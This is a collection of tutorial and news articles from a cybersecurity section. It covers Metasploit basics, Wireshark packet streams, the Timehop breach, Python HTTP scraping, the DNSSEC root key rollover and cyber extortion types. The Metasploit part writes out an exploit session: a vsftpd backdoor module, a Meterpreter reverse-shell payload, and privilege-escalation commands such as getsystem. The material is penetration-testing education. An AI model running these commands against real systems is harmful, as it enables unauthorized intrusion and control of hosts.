
How-To Tutorials - Cybersecurity

90 Articles

Getting Started with Metasploit

Packt
22 Jun 2017
10 min read
In this article by Nipun Jaswal, the author of the book Metasploit Bootcamp, we will cover the following topics:

- Fundamentals of Metasploit
- Benefits of using Metasploit

(For more resources related to this topic, see here.)

Penetration testing is the art of performing a deliberate attack on a network, web application, server, or any device that requires a thorough check-up from the security perspective. The idea of a penetration test is to uncover flaws while simulating real-world threats. A penetration test is performed to identify vulnerabilities and weaknesses in systems so that vulnerable systems can stay immune to threats and malicious activities. Achieving success in a penetration test largely depends on using the right set of tools and techniques; a penetration tester must choose the right tools and methodologies in order to complete a test. When talking about the best tools for penetration testing, the first one that comes to mind is Metasploit. It is considered one of the most practical tools for carrying out penetration testing today. Metasploit offers a wide variety of exploits, a great exploit development environment, information gathering and web testing capabilities, and much more.

The fundamentals of Metasploit

Now that we have completed the setup of Kali Linux, let us talk about the big picture: Metasploit. Metasploit is a security project that provides exploits and tons of reconnaissance features to aid a penetration tester. Metasploit was created by H. D. Moore back in 2003, and since then its rapid development has led it to be recognized as one of the most popular penetration testing tools. Metasploit is entirely a Ruby-driven project and offers a great deal of exploits, payloads, encoding techniques, and loads of post-exploitation features.

Metasploit comes in various editions, as follows:

- Metasploit Pro: This commercial edition offers tons of great features, such as web application scanning and exploitation and automated exploitation, and is quite suitable for professional penetration testers and IT security teams. The Pro edition is used for advanced penetration tests and enterprise security programs.
- Metasploit Express: The Express edition is used for baseline penetration tests. Features in this version include smart exploitation, automated brute forcing of credentials, and much more. This version is quite suitable for IT security teams in small to medium-sized companies.
- Metasploit Community: This is a free version with reduced functionality compared to the Express edition. However, for students and small businesses, this edition is a favorable choice.
- Metasploit Framework: This is a command-line version with all manual tasks, such as manual exploitation, third-party import, and so on. This release is entirely suitable for developers and security researchers.

You can download Metasploit from the following link: https://www.rapid7.com/products/metasploit/download/editions/

We will be using the Metasploit Community and Framework versions. Metasploit also offers various types of user interfaces, as follows:

- The graphical user interface (GUI): This has all the options available at the click of a button. It offers a user-friendly interface that helps to provide cleaner vulnerability management.
- The console interface: This is the most preferred and most popular interface. It provides an all-in-one approach to all the options offered by Metasploit, and it is also considered one of the most stable interfaces.
- The command-line interface: This is the most potent interface, supporting everything from launching exploits to activities such as payload generation. However, remembering each and every command while using the command-line interface is a difficult job.
- Armitage: Armitage by Raphael Mudge added a neat hacker-style GUI to Metasploit. Armitage offers easy vulnerability management, built-in NMAP scans, exploit recommendations, and the ability to automate features using the Cortana scripting language.

Basics of the Metasploit framework

Before we put our hands on the Metasploit framework, let us understand the basic terminologies used in Metasploit. However, the following are not just terminologies but modules that are the heart and soul of the Metasploit project:

- Exploit: This is a piece of code which, when executed, will trigger the vulnerability at the target.
- Payload: This is a piece of code that runs at the target after successful exploitation. It defines the type of access and actions we need to gain on the target system.
- Auxiliary: These are modules that provide additional functionality, such as scanning, fuzzing, sniffing, and much more.
- Encoder: Encoders are used to obfuscate modules to avoid detection by a protection mechanism such as an antivirus or a firewall.
- Meterpreter: This is a payload that uses in-memory stagers based on DLL injection. It provides a variety of functions to perform at the target, which makes it a popular choice.

Architecture of Metasploit

Metasploit comprises various components, such as extensive libraries, modules, plugins, and tools. A diagrammatic view of the structure of Metasploit is as follows. Let's see what these components are and how they work. It is best to start with the libraries that act as the heart of Metasploit. Let's understand the use of the various libraries, as explained in the following table:

Library name | Uses
REX | Handles almost all core functions, such as setting up sockets, connections, formatting, and all other raw functions
MSF CORE | Provides the underlying API and the actual core that describes the framework
MSF BASE | Provides friendly API support to modules

We have many types of modules in Metasploit, and they differ in functionality. We have payload modules for creating access channels to exploited systems. We have auxiliary modules to carry out operations such as information gathering, fingerprinting, fuzzing an application, and logging into various services. Let's examine the basic functionality of these modules, as shown in the following table:

Module type | Working
Payloads | Payloads are used to carry out operations such as connecting to or from the target system after exploitation, or performing a particular task such as installing a service. Payload execution is the next step after the system is exploited successfully.
Auxiliary | Auxiliary modules are a special kind of module that performs specific tasks such as information gathering, database fingerprinting, scanning the network to find a particular service, enumeration, and so on.
Encoders | Encoders are used to encode payloads and attack vectors in order to (or intending to) evade detection by antivirus solutions or firewalls.
NOPs | NOP generators are used for alignment, which results in making exploits stable.
Exploits | The actual code that triggers a vulnerability.

Metasploit framework console and commands

Having gathered knowledge of the architecture of Metasploit, let us now run Metasploit to get hands-on knowledge of the commands and different modules. To start Metasploit, we first need to establish a database connection so that everything we do can be logged into the database. Using a database also speeds up Metasploit's load time by making use of caches and indexes for all modules. Therefore, let us start the postgresql service by typing the following command at the terminal:

root@beast:~# service postgresql start

Now, to initialize Metasploit's database, let us initialize msfdb, as shown in the following screenshot. It is clearly visible in the preceding screenshot that we have successfully created the initial database schema for Metasploit. Let us now start Metasploit's database using the following command:

root@beast:~# msfdb start

We are now ready to launch Metasploit. Let us issue msfconsole in the terminal to start Metasploit, as shown in the following screenshot. Welcome to the Metasploit console; let us run the help command to see what other commands are available to us. The commands shown in the help output are core Metasploit commands, which are used to set/get variables, load plugins, route traffic, unset variables, print the version, find the history of commands issued, and much more. These commands are pretty general. Let's look at the module-based commands next. Everything related to a particular module in Metasploit comes under the module controls section of the help menu. Using these commands, we can select a particular module, load modules from a particular path, get information about a module, show the core and advanced options related to a module, and even edit a module inline.
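Before cataloguing the individual commands below, here is a minimal, representative msfconsole session that strings several of them together. The module and the target address 192.168.10.112 are the lab-style examples used throughout this article, not output from a real engagement:

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options
msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.10.112
RHOST => 192.168.10.112
msf exploit(vsftpd_234_backdoor) > exploit

If the exploit succeeds, Metasploit opens a command shell session on the target; the sessions command lists it, and sessions -i <number> interacts with it, as summarized in the command reference that follows.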
Let us learn some basic commands in Metasploit and familiarize ourselves with their syntax and semantics:

- use [auxiliary/exploit/payload/encoder]: To select a particular module. Example: msf> use exploit/unix/ftp/vsftpd_234_backdoor, msf> use auxiliary/scanner/portscan/tcp
- show [exploits/payloads/encoders/auxiliary/options]: To see the list of available modules of a particular type. Example: msf> show payloads, msf> show options
- set [option/payload]: To set a value for a particular object. Example: msf> set payload windows/meterpreter/reverse_tcp, msf> set LHOST 192.168.10.118, msf> set RHOST 192.168.10.112, msf> set LPORT 4444, msf> set RPORT 8080
- setg [option/payload]: To assign a value to a particular object globally, so that the value does not change when a module is switched. Example: msf> setg RHOST 192.168.10.112
- run: To launch an auxiliary module after all the required options are set. Example: msf> run
- exploit: To launch an exploit. Example: msf> exploit
- back: To unselect a module and move back. Example: msf(ms08_067_netapi)> back
- info: To list the information related to a particular exploit/module/auxiliary. Example: msf> info exploit/windows/smb/ms08_067_netapi, msf(ms08_067_netapi)> info
- search: To find a particular module. Example: msf> search hfs
- check: To check whether a particular target is vulnerable to the exploit or not. Example: msf> check
- sessions: To list the available sessions. Example: msf> sessions [session number]

The most common Meterpreter commands are as follows:

- sysinfo: To list the system information of the compromised host. Example: meterpreter> sysinfo
- ifconfig: To list the network interfaces on the compromised host. Example: meterpreter> ifconfig, meterpreter> ipconfig (Windows)
- arp: To list the IP and MAC addresses of hosts connected to the target. Example: meterpreter> arp
- background: To send an active session to the background. Example: meterpreter> background
- shell: To drop a cmd shell on the target. Example: meterpreter> shell
- getuid: To get the current user details. Example: meterpreter> getuid
- getsystem: To escalate privileges and gain system access. Example: meterpreter> getsystem
- getpid: To get the process ID of the Meterpreter session. Example: meterpreter> getpid
- ps: To list all the processes running on the target. Example: meterpreter> ps

If you are using Metasploit for the very first time, refer to http://www.offensive-security.com/metasploit-unleashed/Msfconsole_Commands for more information on basic commands.

Benefits of using Metasploit

Metasploit is an excellent choice when compared to traditional manual techniques because of certain factors, which are listed as follows:

- The Metasploit framework is open source
- Metasploit supports large testing networks by making use of CIDR identifiers
- Metasploit offers quick generation of payloads, which can be changed or switched on the fly
- Metasploit leaves the target system stable in most cases
- The GUI environment provides a fast and user-friendly way to conduct penetration testing

Summary

Throughout this article, we learned the basics of Metasploit. We learned about the syntax and semantics of various Metasploit commands. We also learned the benefits of using Metasploit.

Resources for Article:

Further resources on this subject:
- Approaching a Penetration Test Using Metasploit [article]
- Metasploit Custom Modules and Meterpreter Scripting [article]
- So, what is Metasploit? [article]


Wireshark: Working with Packet Streams

Packt
11 Mar 2013
3 min read
(For more resources related to this topic, see here.)

Working with Packet Streams

While working on a network capture, there can be multiple network activities going on at once. Consider a small example where you are simultaneously browsing multiple websites through your browser. Several TCP data packets will be flowing across your network for all of these websites, so it becomes tedious to track the data packets belonging to a particular stream or session. This is where Follow TCP Stream comes into action.

When you are visiting multiple websites, each site maintains its own stream of data packets. By using the Follow TCP Stream option, we can apply a filter that locates packets specific to a particular stream. To view the complete stream, select your preferred TCP packet (for example, a GET or POST request). Right-clicking on it will bring up the Follow TCP Stream option. Once you click on Follow TCP Stream, you will notice that a new filter rule is applied to Wireshark and the main capture window reflects all the data packets that belong to that stream. This can be helpful in figuring out what different requests/responses have been generated through a particular session of network interaction.

If you take a closer look at the filter rule applied once you follow a stream, you will see a rule similar to tcp.stream eq <Number>. Here, Number is the stream number that has to be followed to get the various data packets.

An additional operation that can be carried out here is to save the data packets belonging to a particular stream. Once you have followed a particular stream, go to File | Save As, then select Displayed to save only the packets belonging to the viewed stream.

Similar to following the TCP stream, we also have the option to follow UDP and SSL streams. The two options can be reached by selecting the particular protocol type (UDP or SSL) and right-clicking on it; the appropriate follow option will be highlighted according to the selected protocol.

The Wireshark menu icons also provide some quick navigation options to migrate through the captured packets. These icons include:

- Go back in packet history (1): This option traces you back to the last analyzed/selected packet. Clicking on it multiple times keeps pushing you back through your selection history.
- Go forward in packet history (2): This option pushes you forward in the series of packet analysis.
- Go to packet (3): This option is useful for going directly to a specific packet number.
- Go to the first packet (4): This option takes you to the first packet in your current display of the capture window.
- Go to last packet (5): This option jumps your selection to the last packet in your capture window.
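For quick reference, the follow-stream filters discussed above take the following form; the stream numbers 3 and 7 are arbitrary examples you would replace with values from your own capture, and the udp.stream field is only present in Wireshark releases newer than the one described here:

tcp.stream eq 3
udp.stream eq 7

Typing tcp.stream eq 3 directly into the filter bar has the same effect as choosing Follow TCP Stream on a packet that belongs to TCP stream number 3.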
Summary

In this article, we learned how to work with packet streams.

Resources for Article:

Further resources on this subject:
- BackTrack 5: Advanced WLAN Attacks [Article]
- BackTrack 5: Attacking the Client [Article]
- Debugging REST Web Services [Article]


Timehop suffers data breach; 21 million users' data compromised

Richard Gall
09 Jul 2018
3 min read
Timehop, the social media application that brings old posts back into your feed, experienced a data breach on July 4. In a post published yesterday (July 8), the team explained that "an access credential to our cloud computing enterprise was compromised". Timehop believes 21 million users have been affected by the breach. However, it was keen to state that "we have no evidence that any accounts were accessed without authorization."

Timehop has already acted to make the necessary changes. Certain application features have been temporarily disabled, and users have been logged out of the app. Users will also have to re-authenticate Timehop on their social media accounts. The team has deactivated the keys that allow the app to read and show users' social media posts in their feeds.

Timehop explained that the gap between the incident and the public statement was due to the need to "contact with a large number of partners." The investigation needed to be thorough in order for the response to be clear and coordinated.

How did the Timehop data breach happen?

For transparency, Timehop published a detailed technical report on how it believes the hack happened. An unauthorized user first accessed Timehop's cloud computing environment using an authorized user's credentials. This user then conducted 'reconnaissance activities' after creating a new administrative account, and logged in to that account on numerous occasions in March and June 2018. It was only on July 4 that the attacker attempted to access the production database. Timehop states that the attacker then "conducted a specific action that triggered an alarm", which allowed engineers to act quickly to stop the attack from continuing.

Once this was done, there was a detailed and thorough investigation. This included analyzing the attacker's activity on the network and auditing all security permissions and processes.

A measured response to a potential crisis

It's worth noting just how methodical Timehop's response has been. Yes, there will be question marks over the delay, but it does make a lot of sense. Timehop revealed that the news was provided to some journalists "under embargo in order to determine the most effective ways to communicate what had happened while neither causing panic nor resorting to bland euphemism." The incident demonstrates that effective cybersecurity is as much about a robust communication strategy as it is about secure software.

Read next:
- Did Facebook just have another security scare?
- What security and systems specialists are planning to learn in 2018


Scraping the Web with Python - Quick Start

Packt
17 Feb 2016
9 min read
In this article, we're going to acquire intelligence data from a variety of sources. We might interview people. We might steal files from a secret underground base. We might search the World Wide Web (WWW).

(For more resources related to this topic, see here.)

Accessing data from the Internet

The WWW and the Internet are based on a series of agreements called Requests for Comments (RFC). The RFCs define the standards and protocols to interconnect different networks, that is, the rules for internetworking. The WWW is defined by a subset of these RFCs that specifies the protocols, the behaviors of hosts and agents (servers and clients), and file formats, among other details.

In a way, the Internet is a controlled chaos. Most software developers agree to follow the RFCs. Some don't. If their idea is really good, it can catch on, even though it doesn't precisely follow the standards. We often see this in the way some browsers don't work with some websites. This can cause confusion and questions. We'll often have to perform both espionage and plain old debugging to figure out what's available on a given website.

Python provides a variety of modules that implement the software defined in the Internet RFCs. We'll look at some of the common protocols used to gather data through the Internet and the Python library modules that implement these protocols.

Background briefing – the TCP/IP protocols

The essential idea behind the WWW is the Internet. The essential idea behind the Internet is the TCP/IP protocol stack. The IP part of this is the internetworking protocol; it defines how messages can be routed between networks. Layered on top of IP is the TCP protocol, which connects two applications to each other. TCP connections are often made via a software abstraction called a socket. In addition to TCP there's also UDP, but it's not used as much for the kind of WWW data we're interested in.

In Python, we can use the low-level socket library to work with the TCP protocol, but we won't. A socket is a file-like object that supports open, close, input, and output operations. Our software will be much simpler if we work at a higher level of abstraction. The Python libraries that we'll use leverage the socket concept under the hood.

The Internet RFCs define a number of protocols that build on TCP/IP sockets. These are more useful definitions of interactions between host computers (servers) and user agents (clients). We'll look at two of these: Hypertext Transfer Protocol (HTTP) and File Transfer Protocol (FTP).

Using http.client for HTTP GET

The essence of web traffic is HTTP. This is built on TCP/IP. HTTP defines two roles: host and user agent, also called server and client, respectively. We'll stick to server and client. HTTP defines a number of request types, including GET and POST.

A web browser is one kind of client software we can use. This software makes GET and POST requests and displays the results from the web server. We can do this kind of client-side processing in Python using two library modules. The http.client module allows us to make GET and POST requests, as well as PUT and DELETE. We can read the response object. Sometimes the response is an HTML page. Sometimes it's a graphic image. There are other things too, but we're mostly interested in text and graphics.

Here's a picture of a mysterious device we've been trying to find. We need to download this image to our computer so that we can see it and send it to our informant, from http://upload.wikimedia.org/wikipedia/commons/7/72/IPhone_Internals.jpg

Here's a picture of the currency we're supposed to track down and pay with. We need to download this image too. Here is the link: http://upload.wikimedia.org/wikipedia/en/c/c1/1drachmi_1973.jpg

Here's how we can use http.client to get these two image files:

import http.client
import contextlib

path_list = [
    "/wikipedia/commons/7/72/IPhone_Internals.jpg",
    "/wikipedia/en/c/c1/1drachmi_1973.jpg",
]
host = "upload.wikimedia.org"

with contextlib.closing(http.client.HTTPConnection(host)) as connection:
    for path in path_list:
        connection.request("GET", path)
        response = connection.getresponse()
        print("Status:", response.status)
        print("Headers:", response.getheaders())
        _, _, filename = path.rpartition("/")
        print("Writing:", filename)
        with open(filename, "wb") as image:
            image.write(response.read())

We're using http.client to handle the client side of the HTTP protocol. We're also using the contextlib module to politely disentangle our application from network resources when we're done using them.

We've assigned a list of paths to the path_list variable. This example introduces list objects without providing any background. It's important that lists are surrounded by [] and the items are separated by ,. Yes, there's an extra , at the end. This is legal in Python.

We created an http.client.HTTPConnection object using the host computer name. This connection object is a little like a file; it entangles Python with operating system resources on our local computer plus a remote server. Unlike a file, an HTTPConnection object isn't a proper context manager. As we really like context managers to release our resources, we made use of the contextlib.closing() function to handle the context management details. The connection needs to be closed; the closing() function assures that this will happen by calling the connection's close() method.

For all of the paths in our path_list, we make an HTTP GET request. This is what browsers do to get the image files mentioned in an HTML page. We print a few things from each response. The status, if everything worked, will be 200. If the status is not 200, then something went wrong and we'll need to read up on the HTTP status codes to see what happened. If you use a coffee shop Wi-Fi connection, perhaps you're not logged in. You might need to open a browser to set up a connection.

An HTTP response includes headers that provide some additional details about the request and response. We've printed the headers because they can be helpful in debugging any problems we might have. One of the most useful headers is ('Content-Type', 'image/jpeg'). This confirms that we really did get an image.

We used _, _, filename = path.rpartition("/") to locate the right-most / character in the path. Recall that the partition() method locates the left-most instance; we're using the right-most one here. We assigned the directory information and separator to the variable _. Yes, _ is a legal variable name. It's easy to ignore, which makes it a handy shorthand for "we don't care". We kept the filename in the filename variable.

We create a nested context for the resulting image file. We can then read the body of the response—a collection of bytes—and write these bytes to the image file. In one quick motion, the file is ours.

The HTTP GET request is what underlies much of the WWW.
Programs such as curl and wget are expansions of this example. They execute batches of GET requests to locate one or more pages of content. They can do quite a bit more, but this is the essence of extracting data from the WWW.

Changing our client information

An HTTP GET request includes several headers in addition to the URL. In the previous example, we simply relied on the Python http.client library to supply a suitable set of default headers. There are several reasons why we might want to supply different or additional headers. First, we might want to tweak the User-Agent header to change the kind of browser that we're claiming to be. We might also need to provide cookies for some kinds of interactions. For information on the user agent string, see http://en.wikipedia.org/wiki/User_agent_string#User_agent_identification.

This information may be used by the web server to determine whether a mobile device or a desktop device is being used. We can use something like this:

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14

This makes our Python request appear to come from the Safari browser instead of a Python application. We can use something like this to appear to be a different browser on a desktop computer:

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:28.0) Gecko/20100101 Firefox/28.0

We can use something like this to appear to be an iPhone instead of a Python application:

Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53

We make this change by adding headers to the request we're making. The change looks like this:

connection.request("GET", path, headers={
    'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53',
})

This will make the web server treat our Python application like it's on an iPhone. This might lead to a more compact page of data than would be provided to a full desktop computer making the same request.

The header information is a structure with the { key: value, } syntax. It's important that dictionaries are surrounded by {}, the keys and values are separated by :, and each key-value pair is separated by ,. Yes, there's an extra , at the end. This is legal in Python.

There are many more HTTP headers we can provide. The User-Agent header is perhaps the most important for gathering different kinds of intelligence data from web servers.
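Putting the pieces together, a complete sketch that downloads one of the images while claiming to be an iPhone might look like this; the host, path, and user-agent string are the ones used earlier in this article:

import http.client
import contextlib

# One of the iPhone user-agent strings quoted above.
IPHONE_UA = ("Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) "
             "AppleWebKit/537.51.2 (KHTML, like Gecko) "
             "Version/7.0 Mobile/11D201 Safari/9537.53")

host = "upload.wikimedia.org"
path = "/wikipedia/commons/7/72/IPhone_Internals.jpg"

with contextlib.closing(http.client.HTTPConnection(host)) as connection:
    # Supply our own User-Agent header instead of the library default.
    connection.request("GET", path, headers={"User-Agent": IPHONE_UA})
    response = connection.getresponse()
    print("Status:", response.status)   # 200 if everything worked
    body = response.read()              # the raw bytes of the response
    _, _, filename = path.rpartition("/")
    with open(filename, "wb") as image:
        image.write(body)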
You can refer to more books related to this topic via the following links:

- Python for Secret Agents - Volume II: https://www.packtpub.com/application-development/python-secret-agents-volume-ii
- Expert Python Programming: https://www.packtpub.com/application-development/expert-python-programming
- Raspberry Pi for Secret Agents: https://www.packtpub.com/hardware-and-creative/raspberry-pi-secret-agents

Resources for Article:

Further resources on this subject:
- Python Libraries [article]
- Optimization in Python [article]
- Introduction to Object-Oriented Programming using Python, JavaScript, and C# [article]


RedHat shares what to expect from next week’s first-ever DNSSEC root key rollover

Melisha Dsouza
05 Oct 2018
4 min read
On Thursday, October 11, 2018, at 16:00 UTC, ICANN will change the cryptographic key that is at the center of the DNS security system, known as DNSSEC. The current key has been in place since July 15, 2010. This switching of the central security key for DNS is called the Root Key Signing Key (KSK) Rollover.

The replacement was originally planned a year earlier, but the procedure was postponed because of data suggesting that a significant number of resolvers were not ready for the rollover. The question now is: are your systems prepared so that DNS will keep functioning for your networks?

DNSSEC is a system of digital signatures to prevent DNS spoofing. Maintaining an up-to-date KSK is essential to ensuring that DNSSEC-validating DNS resolvers continue to function following the rollover. If the KSK isn't up to date, DNSSEC-validating DNS resolvers will be unable to resolve any DNS queries. If the switch happens smoothly, users will not notice any visible changes and their systems will work as usual. However, if their DNS resolvers are not ready to use the new key, users may not be able to reach many websites!

That being said, there's good news for those who have been keeping up with recent DNS updates. Since this rollover was delayed for almost a year, most DNS resolver software has been shipping with the new key for quite some time. Users who are up to date with this news will have their systems all set for the change. If not, we've got you covered! But first, let's do a quick background check.

As of today, the root zone is still signed by the old KSK with the ID 19036, also called KSK-2010. The new KSK, with the ID 20326, was published in the DNS in July 2017 and is called KSK-2017. KSK-2010 is currently used to sign itself, to sign the Root Zone Signing Key (ZSK), and to sign the new KSK-2017. The rollover only affects the KSK; the ZSK gets updated and replaced more frequently without the need to update the trust anchor inside the resolver. (Diagram source: suse.com)

You can go ahead and watch ICANN's short video to understand all about the switch. Now that you have understood the background, let's go through the checks you need to perform.

#1 Check if you have the new DNSSEC root key installed

Ensure that the new DNSSEC root key (KSK-2017), which has key ID 20326, is present. To check this, look at the following locations:

- bind: see /etc/named.root.key
- unbound / libunbound: see /var/lib/unbound/root.key
- dnsmasq: see /usr/share/dnsmasq/trust-anchors.conf
- knot-resolver: see /etc/knot-resolver/root.keys

There is no need to restart your DNS service unless the server has been running for more than a year and does not support RFC 5011.

#2 A backup plan in case of unexpected problems

The RedHat team assures users that there is a very low probability of DNS issues occurring. In case you do encounter a problem, restart your DNS server. You can also try using dig +dnssec dnskey to inspect the keys. If all else fails, temporarily switch to a public DNS operator.
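As an extra sanity check (a sketch using BIND's dig; any DNSSEC-aware query tool will do), you can query the root zone's DNSKEY records and look for the new key tag in the +multiline annotations:

dig . DNSKEY +multiline

With +multiline, dig annotates each key with a comment such as "; KSK; alg = RSASHA256 ; key id = 20326", so during the rollover window both KSK-2010 (key id 19036) and KSK-2017 (key id 20326) should appear in the answer.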
#3 Check for an incomplete RFC 5011 process

When the switch happens, containers or virtual machines that have old configuration files but new software would hold only the soon-to-be-removed DNSSEC root key. This is logged via RFC 8145 to the root name servers, which provides ICANN with the statistics mentioned above. Such a server then updates the key via RFC 5011, but it is possible that it shuts down before the 30-day hold timer has been reached. It can also happen that the hold timer is reached but the configuration file cannot be written to, or that the file is written but the image is destroyed on shutdown/reboot, so that the container restarts without the new key.

RedHat believes the switch of this cryptographic key will lead to an improved level of security and trust that users can have online! To know more about this rollover, head to RedHat's official blog.
Read next:
- What Google, RedHat, Oracle, and others announced at KubeCon + CloudNativeCon 2018
- Google, IBM, RedHat and others launch Istio 1.0 service mesh for microservices
- Red Hat infrastructure migration solution for proprietary and siloed infrastructure


Introduction to Cyber Extortion

Packt
19 Jun 2017
21 min read
In this article by Dhanya Thakkar, the author of the book Preventing Digital Extortion, explains how often we make the mistake of relying on the past for predicting the future, and nowhere is this more relevant than in the sphere of the Internet and smart technology. People, processes, data, and things are tightly and increasingly connected, creating new, intelligent networks unlike anything else we have seen before. The growth is exponential and the consequences are far reaching for individuals, and progressively so for businesses. We are creating the Internet of Things and the Internet of Everything. (For more resources related to this topic, see here.) It has become unimaginable to run a business without using the Internet. It is not only an essential tool for current products and services, but an unfathomable well for innovation and fresh commercial breakthroughs. The transformative revolution is spillinginto the public sector, affecting companies like vanguards and diffusing to consumers, who are in a feedback loop with suppliers, constantly obtaining and demanding new goods. Advanced technologies that apply not only to machine-to-machine communication but also to smart sensors generate complex networks to which theoretically anything that can carry a sensor can be connected. Cloud computing and cloud-based applications provide immense yet affordable storage capacity for people and organizations and facilitate the spread of data in more ways than one. Keeping in mind the Internet’s nature, the physical boundaries of business become blurred, and virtual data protection must incorporate a new characteristic of security: encryption. In the middle of the storm of the IoT, major opportunities arise, and equally so, unprecedented risks lurk. People often think that what they put on the Internet is protected and closed information. It is hardly so. Sending an e-mail is not like sending a letter in a closed envelope. It is more like sending a postcard, where anyone who gets their hands on it can read what's written on it. Along with people who want to utilize the Internet as an open business platform, there are people who want to find ways of circumventing legal practices and misusing the wealth of data on computer networks by unlawfully gaining financial profits, assets, or authority that can be monetized. Being connected is now critical. As cyberspace is growing, so are attempts to violate vulnerable information gaining global scale. This newly discovered business dynamic is under persistent threat of criminals. Cyberspace, cyber crime, and cyber security are perceptibly being found in the same sentence. Cyber crime –under defined and under regulated A massive problem encouraging the perseverance and evolution of cyber crime is the lack of an adequate unanimous definition and the under regulation on a national, regional, and global level. Nothing is criminal unless stipulated by the law. Global law enforcement agencies, academia, and state policies have studied the constant development of the phenomenon since its first appearance in 1989, in the shape of the AIDS Trojan virus transferred from an infected floppy disk. Regardless of the bizarre beginnings, there is nothing entertaining about cybercrime. It is serious. It is dangerous. Significant efforts are made to define cybercrime on a conceptual level in academic research and in national and regional cybersecurity strategies. Still, as the nature of the phenomenon evolves, so must the definition. 
Research reports are still at a descriptive level, and underreporting is a major issue. On the other hand, businesses are more exposed due to ignorance of the fact that modern-day criminals increasingly rely on the Internet to enhance their criminal operations. Case in point: Aaushi Shah and Srinidhi Ravi from the Asian School of Cyber Laws have created a cybercrime list by compiling a set of 74 distinctive and creativelynamed actions emerging in the last three decades that can be interpreted as cybercrime. These actions target anything from e-mails to smartphones, personal computers, and business intranets: piggybacking, joe jobs, and easter eggs may sound like cartoons, but their true nature resembles a crime thriller. The concept of cybercrime Cyberspace is a giant community made out of connected computer users and data on a global level. As a concept, cybercrime involves any criminal act dealing withcomputers andnetworks, including traditional crimes in which the illegal activities are committed through the use of a computer and the Internet. As businesses become more open and widespread, the boundary between data freedom and restriction becomes more porous. Countless e-shopping transactions are made, hospitals keep record of patient histories, students pass exams, and around-the-clock payments are increasingly processed online. It is no wonder that criminals are relentlessly invading cyberspace trying to find a slipping crack. There are no recognizable border controls on the Internet, but a business that wants to evade harm needs to understand cybercrime's nature and apply means to restrict access to certain information. Instead of identifying it as a single phenomenon, Majid Jar proposes a common denominator approach for all ICT-related criminal activities. In his book Cybercrime and Society, Jar refers to Thomas and Loader’s working concept of cybercrime as follows: “Computer-mediated activities which are either illegal or considered illicit by certain parties and which can be conducted through global electronic network.” Jar elaborates the important distinction of this definition by emphasizing the difference between crime and deviance. Criminal activities are explicitly prohibited by formal regulations and bear sanctions, while deviances breach informal social norms. This is a key note to keep in mind. It encompasses the evolving definition of cybercrime, which keeps transforming after resourceful criminals who constantly think of new ways to gain illegal advantages. Law enforcement agencies on a global level make an essential distinction between two subcategories of cybercrime: Advanced cybercrime or high-tech crime Cyber-enabled crime The first subcategory, according to Interpol, includes newly emerged sophisticated attacks against computer hardware and software. On the other hand, the second category contains traditional crimes in modern clothes,for example crimes against children, such as exposing children to illegal content; financial crimes, such as payment card frauds, money laundering, and counterfeiting currency and security documents; social engineering frauds; and even terrorism. We are much beyond the limited impact of the 1989 cybercrime embryo. Intricate networks are created daily. They present new criminal opportunities, causing greater damage to businesses and individuals, and require a global response. 
Cybercrime is conceptualized as a service embracing a commercial component.Cybercriminals work as businessmen who look to sell a product or a service to the highest bidder. Critical attributes of cybercrime An abridged version of the cybercrime concept provides answers to three vital questions: Where are criminal activities committed and what technologies are used? What is the reason behind the violation? Who is the perpetrator of the activities? Where and how – realm Cybercrime can be an online, digitally committed, traditional offense. Even if the component of an online, digital, or virtual existence were not included in its nature, it would still have been considered crime in the traditional, real-world sense of the word. In this sense, as the nature of cybercrime advances, so mustthe spearheads of lawenforcement rely on laws written for the non-digital world to solve problems encountered online. Otherwise, the combat becomesstagnant and futile. Why – motivation The prefix "cyber" sometimes creates additional misperception when applied to the digital world. It is critical to differentiate cybercrime from other malevolent acts in the digital world by considering the reasoning behind the action. This is not only imperative for clarification purposes, but also for extending the definition of cybercrime over time to include previously indeterminate activities. Offenders commit a wide range of dishonest acts for selfish motives such as monetary gain, popularity, or gratification. When the intent behind the behavior is misinterpreted, confusion may arise and actions that should not have been classified as cybercrime could be charged with criminal prosecution. Who –the criminal deed component The action must be attributed to a perpetrator. Depending on the source, certain threats can be translated to the criminal domain only or expanded to endanger potential larger targets, representing an attack to national security or a terrorist attack. Undoubtedly, the concept of cybercrime needs additional refinement, and a comprehensive global definition is in progress. Along with global cybercrime initiatives, national regulators are continually working on implementing laws, policies, and strategies to exemplify cybercrime behaviors and thus strengthen combating efforts. Types of common cyber threats In their endeavors to raise cybercrime awareness, the United Kingdom'sNational Crime Agency (NCA) divided common and popular cybercrime activities by affiliating themwith the target under threat. While both individuals and organizations are targets of cyber criminals, it is the business-consumer networks that suffer irreparable damages due to the magnitude of harmful actions. Cybercrime targeting consumers Phishing The term encompasses behavior where illegitimate e-mails are sent to the receiver to collect security information and personal details Webcam manager A webcam manager is an instance of gross violating behavior in which criminals take over a person's webcam File hijacker Criminals hijack files and hold them "hostage" until the victim pays the demanded ransom Keylogging With keylogging, criminals have the means to record what the text behind the keysyou press on your keyboard is Screenshot manager A screenshot manager enables criminals to take screenshots of an individual’s computer screen Ad clicker Annoying but dangerous ad clickers direct victims’ computer to click on a specific harmful link Cybercrime targeting businesses Hacking Hacking is basically unauthorized access to computer data. 
